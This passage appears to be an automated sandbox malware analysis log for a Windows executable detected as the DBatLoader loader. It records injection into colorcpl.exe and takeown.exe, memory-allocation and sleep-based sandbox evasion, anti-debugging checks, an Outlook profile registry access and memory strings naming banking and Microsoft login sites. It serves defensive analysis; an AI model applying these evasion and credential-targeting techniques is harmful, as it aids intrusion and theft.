              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeWindow found: window name: SysTabControl32Jump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeWindow detected: Number of UI elements: 12
              Source: C:\Windows\SysWOW64\takeown.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
              Source: z10982283782.exeStatic file information: File size 1114112 > 1048576
              Source: Binary string: colorcpl.pdbGCTL source: takeown.exe, 0000000D.00000002.2488818800.000000000093E000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000D.00000002.2492977299.000000000364C000.00000004.10000000.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000E.00000002.2492630368.000000000280C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.1830307466.0000000028E9C000.00000004.80000000.00040000.00000000.sdmp
              Source: Binary string: colorcpl.pdb source: takeown.exe, 0000000D.00000002.2488818800.000000000093E000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000D.00000002.2492977299.000000000364C000.00000004.10000000.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000E.00000002.2492630368.000000000280C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.1830307466.0000000028E9C000.00000004.80000000.00040000.00000000.sdmp
              Source: Binary string: takeown.pdbGCTL source: colorcpl.exe, 0000000A.00000003.1492463807.00000000028A1000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000A.00000002.1523639255.00000000028A0000.00000004.00000020.00020000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000C.00000003.1462420383.0000000000BEB000.00000004.00000020.00020000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000C.00000002.2490451481.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000C.00000002.2490451481.0000000000BF7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ObMmiCfBgqmt.exe, 0000000C.00000002.2488106778.00000000004BE000.00000002.00000001.01000000.00000008.sdmp, ObMmiCfBgqmt.exe, 0000000E.00000002.2489652502.00000000004BE000.00000002.00000001.01000000.00000008.sdmp
              Source: Binary string: easinvoker.pdb source: z10982283782.exe, z10982283782.exe, 00000000.00000003.1235919667.000000007FAC0000.00000004.00001000.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1236633827.000000007F8B0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: colorcpl.exe, 0000000A.00000003.1431854432.0000000022542000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000A.00000002.1538249660.000000002288E000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000A.00000003.1430019067.00000000048CE000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 0000000D.00000002.2492291107.0000000003020000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 0000000D.00000003.1531374042.0000000000C3D000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000D.00000003.1523711337.0000000000A3D000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000D.00000002.2492291107.00000000031BE000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: takeown.pdb source: colorcpl.exe, 0000000A.00000003.1492463807.00000000028A1000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000A.00000002.1523639255.00000000028A0000.00000004.00000020.00020000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000C.00000003.1462420383.0000000000BEB000.00000004.00000020.00020000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000C.00000002.2490451481.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000C.00000002.2490451481.0000000000BF7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: colorcpl.exe, colorcpl.exe, 0000000A.00000003.1431854432.0000000022542000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000A.00000002.1538249660.000000002288E000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000A.00000003.1430019067.00000000048CE000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, takeown.exe, 0000000D.00000002.2492291107.0000000003020000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 0000000D.00000003.1531374042.0000000000C3D000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000D.00000003.1523711337.0000000000A3D000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000D.00000002.2492291107.00000000031BE000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdbGCTL source: z10982283782.exe, 00000000.00000002.1351975173.00000000028CF000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1235919667.000000007FAC0000.00000004.00001000.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1236423933.00000000028D8000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1236633827.000000007F8B0000.00000004.00001000.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Yara detected DBatLoader
              Source: Yara matchFile source: 0.2.z10982283782.exe.2a90000.0.unpack, type: UNPACKEDPE
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02AA894C LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02AA894C
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02ABD2FC push 02ABD367h; ret 0_2_02ABD35F
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02A963AE push 02A9640Bh; ret 0_2_02A96403
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02A963B0 push 02A9640Bh; ret 0_2_02A96403
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02A9332C push eax; ret 0_2_02A93368
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02ABC378 push 02ABC56Eh; ret 0_2_02ABC566
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02A9C349 push 8B02A9C1h; ret 0_2_02A9C34E
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02ABD0AC push 02ABD125h; ret 0_2_02ABD11D
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02AA306B push 02AA30B9h; ret 0_2_02AA30B1
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02AA306C push 02AA30B9h; ret 0_2_02AA30B1
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02ABD1F8 push 02ABD288h; ret 0_2_02ABD280
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02AAF108 push ecx; mov dword ptr [esp], edx0_2_02AAF10D
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02ABD144 push 02ABD1ECh; ret 0_2_02ABD1E4
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02A96782 push 02A967C6h; ret 0_2_02A967BE
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02A96784 push 02A967C6h; ret 0_2_02A967BE
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02A9D5A0 push 02A9D5CCh; ret 0_2_02A9D5C4
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02A9C56C push ecx; mov dword ptr [esp], edx0_2_02A9C571
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02ABC570 push 02ABC56Eh; ret 0_2_02ABC566
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02AAAAE0 push 02AAAB18h; ret 0_2_02AAAB10
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02AA8AD8 push 02AA8B10h; ret 0_2_02AA8B08
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02AAAADF push 02AAAB18h; ret 0_2_02AAAB10
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02B04A50 push eax; ret 0_2_02B04B20
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02A9CA4E push 02A9CD72h; ret 0_2_02A9CD6A
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02A9CBEC push 02A9CD72h; ret 0_2_02A9CD6A
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02AA886C push 02AA88AEh; ret 0_2_02AA88A6
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02AA790C push 02AA7989h; ret 0_2_02AA7981
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02AA6948 push 02AA69F3h; ret 0_2_02AA69EB
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02AA6946 push 02AA69F3h; ret 0_2_02AA69EB
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02AA5E7C push ecx; mov dword ptr [esp], edx0_2_02AA5E7E
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02AA2F60 push 02AA2FD6h; ret 0_2_02AA2FCE
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_065F2F80 push eax; ret 10_2_065F2F82
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_065F6C76 pushad ; ret 10_2_065F6C77
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02AAAB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_02AAAB1C
              Source: C:\Users\user\Desktop\z10982283782.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\takeown.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\takeown.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\takeown.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\takeown.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\takeown.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Allocates many large memory junks
              Source: C:\Users\user\Desktop\z10982283782.exeMemory allocated: 2A90000 memory commit 500006912Jump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeMemory allocated: 2A91000 memory commit 500178944Jump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeMemory allocated: 2ABD000 memory commit 500002816Jump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeMemory allocated: 2ABE000 memory commit 500350976Jump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeMemory allocated: 2B14000 memory commit 501014528Jump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeMemory allocated: 2C0C000 memory commit 500006912Jump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeMemory allocated: 2C0E000 memory commit 500015104Jump to behavior
              Switches to a custom stack to bypass stack traces
              Source: C:\Windows\SysWOW64\takeown.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
              Source: C:\Windows\SysWOW64\takeown.exeAPI/Special instruction interceptor: Address: 7FFB2CECD7E4
              Source: C:\Windows\SysWOW64\takeown.exeAPI/Special instruction interceptor: Address: 7FFB2CECD944
              Source: C:\Windows\SysWOW64\takeown.exeAPI/Special instruction interceptor: Address: 7FFB2CECD504
              Source: C:\Windows\SysWOW64\takeown.exeAPI/Special instruction interceptor: Address: 7FFB2CECD544
              Source: C:\Windows\SysWOW64\takeown.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
              Source: C:\Windows\SysWOW64\takeown.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
              Source: C:\Windows\SysWOW64\takeown.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2276096E rdtsc 10_2_2276096E
              Source: C:\Windows\SysWOW64\takeown.exeWindow / User API: threadDelayed 1041Jump to behavior
              Source: C:\Windows\SysWOW64\takeown.exeWindow / User API: threadDelayed 8932Jump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeAPI coverage: 0.6 %
              Source: C:\Windows\SysWOW64\takeown.exeAPI coverage: 2.6 %
              Source: C:\Windows\SysWOW64\takeown.exe TID: 1916Thread sleep count: 1041 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\takeown.exe TID: 1916Thread sleep time: -2082000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\takeown.exe TID: 1916Thread sleep count: 8932 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\takeown.exe TID: 1916Thread sleep time: -17864000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe TID: 4016Thread sleep time: -35000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\takeown.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\takeown.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02A95908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02A95908
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0068C5F0 FindFirstFileW,FindNextFileW,FindClose,13_2_0068C5F0
              Source: dGg-0-kL.13.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
              Source: dGg-0-kL.13.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
              Source: dGg-0-kL.13.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
              Source: dGg-0-kL.13.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
              Source: dGg-0-kL.13.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
              Source: dGg-0-kL.13.drBinary or memory string: outlook.office.comVMware20,11696492231s
              Source: dGg-0-kL.13.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
              Source: dGg-0-kL.13.drBinary or memory string: AMC password management pageVMware20,11696492231
              Source: dGg-0-kL.13.drBinary or memory string: interactivebrokers.comVMware20,11696492231
              Source: dGg-0-kL.13.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
              Source: z10982283782.exe, 00000000.00000002.1349705581.0000000000706000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: dGg-0-kL.13.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
              Source: dGg-0-kL.13.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
              Source: dGg-0-kL.13.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
              Source: dGg-0-kL.13.drBinary or memory string: outlook.office365.comVMware20,11696492231t
              Source: z10982283782.exe, 00000000.00000002.1349705581.00000000006EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: dGg-0-kL.13.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
              Source: dGg-0-kL.13.drBinary or memory string: discord.comVMware20,11696492231f
              Source: firefox.exe, 00000011.00000002.1831758654.0000021968EBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: dGg-0-kL.13.drBinary or memory string: global block list test formVMware20,11696492231
              Source: dGg-0-kL.13.drBinary or memory string: dev.azure.comVMware20,11696492231j
              Source: dGg-0-kL.13.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
              Source: dGg-0-kL.13.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
              Source: dGg-0-kL.13.drBinary or memory string: bankofamerica.comVMware20,11696492231x
              Source: dGg-0-kL.13.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
              Source: dGg-0-kL.13.drBinary or memory string: tasks.office.comVMware20,11696492231o
              Source: z10982283782.exe, 00000000.00000002.1349705581.0000000000706000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW?u
              Source: dGg-0-kL.13.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
              Source: dGg-0-kL.13.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
              Source: dGg-0-kL.13.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
              Source: dGg-0-kL.13.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
              Source: takeown.exe, 0000000D.00000002.2488818800.000000000093E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll@
              Source: dGg-0-kL.13.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
              Source: dGg-0-kL.13.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
              Source: dGg-0-kL.13.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
              Source: dGg-0-kL.13.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
              Source: ObMmiCfBgqmt.exe, 0000000E.00000002.2491546637.0000000000B9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllD
              Source: C:\Users\user\Desktop\z10982283782.exeAPI call chain: ExitProcess graph end nodegraph_0-33148
              Source: C:\Users\user\Desktop\z10982283782.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02AAF744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,0_2_02AAF744
              Source: C:\Users\user\Desktop\z10982283782.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\takeown.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2276096E rdtsc 10_2_2276096E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22762B60 NtClose,LdrInitializeThunk,10_2_22762B60
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02AA894C LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02AA894C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227D0274 mov eax, dword ptr fs:[00000030h]10_2_227D0274
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227D0274 mov eax, dword ptr fs:[00000030h]10_2_227D0274
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227D0274 mov eax, dword ptr fs:[00000030h]10_2_227D0274
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227D0274 mov eax, dword ptr fs:[00000030h]10_2_227D0274
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227D0274 mov eax, dword ptr fs:[00000030h]10_2_227D0274
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227D0274 mov eax, dword ptr fs:[00000030h]10_2_227D0274
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227D0274 mov eax, dword ptr fs:[00000030h]10_2_227D0274
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227D0274 mov eax, dword ptr fs:[00000030h]10_2_227D0274
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227D0274 mov eax, dword ptr fs:[00000030h]10_2_227D0274
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227D0274 mov eax, dword ptr fs:[00000030h]10_2_227D0274
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227D0274 mov eax, dword ptr fs:[00000030h]10_2_227D0274
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227D0274 mov eax, dword ptr fs:[00000030h]10_2_227D0274
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22724260 mov eax, dword ptr fs:[00000030h]10_2_22724260
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22724260 mov eax, dword ptr fs:[00000030h]10_2_22724260
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22724260 mov eax, dword ptr fs:[00000030h]10_2_22724260
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2271826B mov eax, dword ptr fs:[00000030h]10_2_2271826B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2271A250 mov eax, dword ptr fs:[00000030h]10_2_2271A250
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227F625D mov eax, dword ptr fs:[00000030h]10_2_227F625D
